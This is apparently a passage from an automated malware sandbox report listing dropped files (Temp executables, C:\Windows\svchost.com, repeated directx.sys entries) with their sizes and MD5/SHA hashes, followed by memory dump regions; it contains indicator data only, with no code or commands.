b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d15pv3i5.pwh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\adns.exe

Filesize
885KB

MD5
3293e76bde33e374df998dc83874f03b

SHA1
44a13df0874936715bbb6ec9bb698bedc268c7e9

SHA256
4874508b4662cdbe145b4c70f86c70c7ce3237730098e41a67f2a961bd048953

SHA512
f37a23cadbb30996a3f2a56babd9b513c53134546f5976941e33b3b635a290e3fd5313657db249309dba97993ade6712f6a7c4a6f0f93df10f14b80e7f3662f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\birgjg.exe

Filesize
74KB

MD5
2d3674c9c49917f4ab1b184f902a3fb5

SHA1
965e91f0c8c675278ebf6b5e6f1687b88235aee6

SHA256
e11a5c87ca7396605d463a85260fc02168c43d0c51b5c116e95fc931b146197c

SHA512
d4ac5fa081c003ecf2df6988d567895445ee692b70df7c334659143b4d4e760a7edf3709bddafe65c8777df9304ac3a80289ce27fa7ad367c57dcbf472c6dfea

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7FA1.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8005.tmp

Filesize
114KB

MD5
e54dec68d633001c42366d0ecde3f2e0

SHA1
68ad889d9b6f02fa8d7c3df69d30eeff5745ef52

SHA256
387015740938f6d013d089c66d2250c6f4e80f9d7d7a0887043df3dc3f812f02

SHA512
dd531dfbbb35f4d92858227bebb93f396690e8a902cd61fc80e7a981cd34a4fdd8490130a552069f48f6a06f21f7c3a63e6e205274bb50f85cb81a1b329901f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8020.tmp

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8036.tmp

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp803C.tmp

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8067.tmp

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\xuolte.exe

Filesize
362KB

MD5
04f6199077e9f38cfedeeb416fd32d74

SHA1
dcb90da8e1b1fc751048be717d9f006dbc8455d7

SHA256
89e2b48d77f2570b6efa28fa69f4d05c1c9f71308a045587d0fbd1e5cb7aef9b

SHA512
e9c56882ff4660aba8c85911aaa27033b2cce25d8b6c46266963c754a738426f9ebac7c23193f9d10df434160c52ddc5dee5eeb20c64dddaf428cdc517f846a9

Download Submit
C:\Windows\directx.sys

Filesize
29B

MD5
8e966011732995cd7680a1caa974fd57

SHA1
2b22d69074bfa790179858cc700a7cbfd01ca557

SHA256
97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b

SHA512
892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
e90f627f1e8904a6300fad80caf8d83d

SHA1
558ec22b286660ab3e8505276186fa7bed4b31c8

SHA256
21b74f463b095e3f4e95b3f2d1fbb4c38691979b0d4612869a829c2e273b90c2

SHA512
39fabb5b29fbaeea617411edb07a0af94896d95b6560ca2db81a3c9925624558762937eac6920aa638cd98947efac66e39ad8fbd3aee214b00c362ae7c499e64

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
93ff3ce711d1891cbab8da51baebc66c

SHA1
dc7c8527a2f0e815f5941513f06ab7ae86f43dc2

SHA256
7c15372fcda08682ac420bcf1b8741fce64cf3f3c46e225602d8cbde83733cb2

SHA512
a9ce09f2798b51be5d65ecb1f767432d7ab998b2d9661b41847961887c6d8accc8f5a513f89d81485f2505e9fc638d32a30dd59459edf0c63fe6a3a50f476b85

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
7255ceccb8e1515e7ce2aaaa86118812

SHA1
cc654c7ca09a7b1188b77b5ee7fc4f0b96aa92c1

SHA256
1e4bb1e7a3650823cc02f9daa3a69a972fd169a21e7160f80530295194d9fcb1

SHA512
9dbb1a432a16bd9c64a0671e5c2dcbbf899e49c9dbce0e9a062b4cb599f6f16d081f7470b24e053e384b8ee2f62fc9001bde043e32e89691e089f691e2b1be73

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
9a77237d07fe4516ec477a68e33d7c69

SHA1
8be8bd44df43eb279683e0f3a059fe0acbf03c49

SHA256
a07d7fff1fdd938bf7b1582d89671717a3485bf6b06aac522340057a19ad761d

SHA512
31dc57aa5bf0807fe235ac168e4312c13ead3e36de52b35e86b9f8edb98f8985973ad0fd6536a8bc7641bb5c6ea46d0ffa28ca7896bcc02dedb635191b1e0ec7

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
aa5680b19950ece337458c6ab27f3c4a

SHA1
c54ac256524ef6b31f4b3f4012145eda9e637dc3

SHA256
ad6231f8839482e5c7036b098e72fac5769d4eafac973df09e70d67218f9b2fb

SHA512
b8b1eb290cce782a3d6068e6342fc02c0b21e464efdaa37dd7d62d1740d14c2f7e60fc28ec65b07404fa7041cfb4f21419ea4fff0303b6aeef03d79dcb1f0462

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
ae4e3deb66eb45c4824997f5cd2b0764

SHA1
a4abea6a82bc84aa3444359b63f1d1682aed6c0e

SHA256
262d8b542075aedfdf2f2c72c5449bc22fe9efea72d393e012c5f995b2eef41a

SHA512
562a24982d01dbe31d69b82b301c0251500e7a6e2f3dd73e0ea0b5f77bf2ac627da63b0db8e398bfe2897686c5165bdeb2e2659d77164bb66e1b61fb0a0eb9c1

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
9efd66da176fc9a23c8451308cf9945b

SHA1
123d5a08f9c8f4900f6b06c0948a1daac2598e8e

SHA256
65e987db4ad11fba949674f33105739bbbf052fb50745d35256af4e1f0876611

SHA512
26ea531fbad7d7be74f95911df371c4444aa247b87e4539fc0fa1b9b65cbdcc783c5eb37c1f4edf68f3b7c05da276e37f12f72a46f49735e9a63115d4a8263e7

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
091f7afcc45abc7f35f0c2f2754efff4

SHA1
55d5cc34defb982dda7d5f9d25653cfe6d10a8e8

SHA256
1c1f30de9d4c58b830b170824403c9e1dd6ef076b26e1512fd42a262692b6554

SHA512
d1fb8135b643357341568debbfa7132ff415ac25b3ec9da3fd37c106be21f8423fcf270a82286b822f9ebcfd00d32beb061f17cd34958f269e0497f278a071bf

Download Submit
C:\Windows\directx.sys

Filesize
46B

MD5
981bba1addb7fc61c332faedc1d77c50

SHA1
0214a4e908d96cacdab817831be2e4e15696196c

SHA256
9f0a1d390a5d018a77ecfe759bfa4eefe0034d8036b47abd139b0e7ae65cf93c

SHA512
e56106abcab361629a2eb7a8c0257d0ffe59ad78dc91fff6941fb365c93af915d477e8230065898bec2d02a010ad984708c8391eab6b2f04889d7064e19fe794

Download Submit
C:\Windows\svchost.com

Filesize
40KB

MD5
36fd5e09c417c767a952b4609d73a54b

SHA1
299399c5a2403080a5bf67fb46faec210025b36d

SHA256
980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

SHA512
1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

Download Submit
memory/232-3571-0x0000023BF9D40000-0x0000023BF9D6A000-memory.dmp

Filesize
168KB

Download
memory/232-2367-0x0000023BF9970000-0x0000023BF9992000-memory.dmp

Filesize
136KB

Download
memory/548-4698-0x00000000064B0000-0x0000000006807000-memory.dmp

Filesize
3.3MB

Download
memory/656-2134-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/656-2132-0x0000000007AA0000-0x0000000007B36000-memory.dmp

Filesize
600KB

Download
memory/656-2122-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/656-2129-0x00000000063B0000-0x0000000006707000-memory.dmp

Filesize
3.3MB

Download
memory/656-2119-0x00000000061C0000-0x00000000061E2000-memory.dmp

Filesize
136KB

Download
memory/656-2131-0x0000000006B60000-0x0000000006BAC000-memory.dmp

Filesize
304KB

Download
memory/656-2130-0x0000000006830000-0x000000000684E000-memory.dmp

Filesize
120KB

Download
memory/656-2133-0x0000000006D50000-0x0000000006D6A000-memory.dmp

Filesize
104KB

Download
memory/656-2118-0x0000000005B00000-0x000000000612A000-memory.dmp

Filesize
6.2MB

Download
memory/656-2117-0x0000000005390000-0x00000000053C6000-memory.dmp

Filesize
216KB

Download
memory/868-3566-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/868-2107-0x0000000004D60000-0x0000000004DFC000-memory.dmp

Filesize
624KB

Download
memory/868-2109-0x0000000005FA0000-0x0000000006016000-memory.dmp

Filesize
472KB

Download
memory/868-2110-0x0000000005F20000-0x0000000005F82000-memory.dmp

Filesize
392KB

Download
memory/868-2111-0x0000000006080000-0x000000000609E000-memory.dmp

Filesize
120KB

Download
memory/868-4660-0x0000000005B80000-0x0000000005BE2000-memory.dmp

Filesize
392KB

Download
memory/868-1322-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/868-1119-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/868-5072-0x0000000006D00000-0x0000000006D64000-memory.dmp

Filesize
400KB

Download
memory/868-5078-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/1092-4618-0x0000000006340000-0x0000000006697000-memory.dmp

Filesize
3.3MB

Download
memory/1616-2456-0x0000000000B70000-0x0000000000B88000-memory.dmp

Filesize
96KB

Download
memory/2036-1062-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/2036-3548-0x0000000006150000-0x0000000006254000-memory.dmp

Filesize
1.0MB

Download
memory/2036-2511-0x0000000005D30000-0x0000000005EB4000-memory.dmp

Filesize
1.5MB

Download
memory/2036-2510-0x0000000005BB0000-0x0000000005D32000-memory.dmp

Filesize
1.5MB

Download
memory/2036-2499-0x0000000000FC0000-0x000000000114C000-memory.dmp

Filesize
1.5MB

Download
memory/2036-2371-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/2036-2106-0x0000000004E10000-0x0000000004E6C000-memory.dmp

Filesize
368KB

Download
memory/2036-1059-0x0000000000180000-0x0000000000264000-memory.dmp

Filesize
912KB

Download
memory/2036-1063-0x0000000004B70000-0x0000000004C48000-memory.dmp

Filesize
864KB

Download
memory/2036-1064-0x0000000004C50000-0x0000000004D2A000-memory.dmp

Filesize
872KB

Download
memory/2064-38-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-48-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-22-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-29-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-6-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-8-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-12-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-14-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-20-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-24-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-26-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-30-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-32-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-34-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-36-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-18-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-16-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-4-0x0000000006670000-0x0000000006824000-memory.dmp

Filesize
1.7MB

Download
memory/2064-3-0x0000000005290000-0x0000000005442000-memory.dmp

Filesize
1.7MB

Download
memory/2064-2-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/2064-1-0x0000000000660000-0x000000000081E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-5-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-51-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-1045-0x0000000005B60000-0x0000000006106000-memory.dmp

Filesize
5.6MB

Download
memory/2064-52-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-10-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-40-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-42-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-44-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-68-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-66-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-1048-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/2064-1046-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/2064-1044-0x0000000005510000-0x00000000055A2000-memory.dmp

Filesize
584KB

Download
memory/2064-64-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-62-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-60-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-58-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-1060-0x00000000062C0000-0x0000000006314000-memory.dmp

Filesize
336KB

Download
memory/2064-56-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-54-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-1216-0x000000007468E000-0x000000007468F000-memory.dmp

Filesize
4KB

Download
memory/2064-0-0x000000007468E000-0x000000007468F000-memory.dmp

Filesize
4KB

Download
memory/2064-46-0x0000000006670000-0x000000000681E000-memory.dmp

Filesize
1.7MB

Download
memory/2064-1041-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/2064-1042-0x0000000006A50000-0x0000000006B84000-memory.dmp

Filesize
1.2MB

Download
memory/2064-1043-0x0000000006870000-0x00000000068BC000-memory.dmp

Filesize
304KB

Download
memory/2064-2108-0x0000000074680000-0x0000000074E31000-memory.dmp

Filesize
7.7MB

Download
memory/2856-4982-0x00000000006B0000-0x00000000006C8000-memory.dmp

Filesize
96KB

Download
memory/3040-2115-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3640-4244-0x0000000005390000-0x00000000053A2000-memory.dmp

Filesize
72KB

Download
memory/3640-4364-0x0000000006B00000-0x0000000006CC2000-memory.dmp

Filesize
1.8MB

Download
memory/3640-4322-0x0000000005870000-0x000000000597A000-memory.dmp

Filesize
1.0MB

Download
memory/3640-4292-0x0000000005430000-0x000000000547C000-memory.dmp

Filesize
304KB

Download
memory/3640-4264-0x00000000053F0000-0x000000000542C000-memory.dmp

Filesize
240KB

Download
memory/3640-4365-0x0000000007200000-0x000000000772C000-memory.dmp

Filesize
5.2MB

Download
memory/3640-4243-0x0000000005990000-0x0000000005FA8000-memory.dmp

Filesize
6.1MB

Download
memory/3640-4206-0x0000000000A40000-0x0000000000A5E000-memory.dmp

Filesize
120KB

Download
memory/4104-2449-0x0000000005FF0000-0x000000000603C000-memory.dmp

Filesize
304KB

Download
memory/4104-2440-0x00000000059B0000-0x0000000005D07000-memory.dmp

Filesize
3.3MB

Download
memory/4196-2252-0x0000000000240000-0x0000000000252000-memory.dmp

Filesize
72KB

Download
memory/4304-2491-0x0000000006420000-0x000000000646C000-memory.dmp

Filesize
304KB

Download
memory/4468-4738-0x0000000000D20000-0x0000000000D38000-memory.dmp

Filesize
96KB

Download